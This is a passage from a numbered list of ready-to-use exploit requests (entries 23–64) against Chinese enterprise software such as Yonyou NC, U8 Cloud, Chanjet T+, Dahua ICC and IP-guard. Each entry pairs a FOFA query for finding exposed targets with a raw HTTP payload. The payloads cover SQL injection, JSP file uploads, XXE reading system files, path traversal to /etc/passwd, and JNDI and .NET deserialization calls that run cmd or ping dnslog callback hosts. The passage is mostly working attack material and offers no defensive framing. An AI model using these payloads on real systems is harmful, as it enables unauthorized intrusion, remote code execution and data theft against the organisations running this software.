User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

Same endpoint and same fastjson DNS-callback probe as entry 21, with the callback domain left as a placeholder.

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

The fname field controls where the uploaded content is written; the POC drops a JSP into the web root (nc_web), and requesting that JSP afterwards returns the string it prints.

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A


64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
